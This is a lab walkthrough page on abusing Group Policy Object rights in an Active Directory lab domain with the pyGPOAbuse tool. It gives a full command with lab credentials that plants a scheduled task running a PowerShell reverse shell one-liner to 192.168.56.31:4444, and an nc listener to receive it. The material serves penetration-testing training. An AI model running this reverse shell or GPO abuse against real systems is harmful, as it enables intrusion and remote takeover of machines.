GPO abuse

There is a GPO abuse on the north domain

To abuse GPO we will use the project created by Hackndo : pyGPOAbuse
The github readme file say : “It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.”

git clone https://github.com/Hackndo/pyGPOAbuse.git
cd pyGPOAbuse
python3 -m pip install virtualenv
python3 -m virtualenv .venv
source .venv/bin/activate
python3 -m pip install -r requirements.txt

We get the id from bloodhound and launch the exploit with :

Now let’s try to get a powershell reverseshell

python3 pygpoabuse.py north.NewYork.local/miguel.cabrera:'ilovebaseball' -gpo-id "628D4237-8B4A-42C3-8599-66EB15352C43" -powershell -command "\$c = New-Object System.Net.Sockets.TCPClient('192.168.56.31',4444);\$s = \$c.GetStream();[byte[]]\$b = 0..65535|%{0};while((\$i = \$s.Read(\$b, 0, \$b.Length)) -ne 0){    \$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0, \$i);    \$sb = (iex \$d 2>&1 | Out-String );    \$sb = ([text.encoding]::ASCII).GetBytes(\$sb + 'ps> ');    \$s.Write(\$sb,0,\$sb.Length);    \$s.Flush()};\$c.Close()" -taskname "MyTask" -description "You are done"

Catch the Shell - this needs to be done from the Lab Parrot OS VM.

nc -nlvp 4444

And a few moments later we get the powershell reverseshell

PreviousSilver ticket NextRead Laps password

Last updated 2 years ago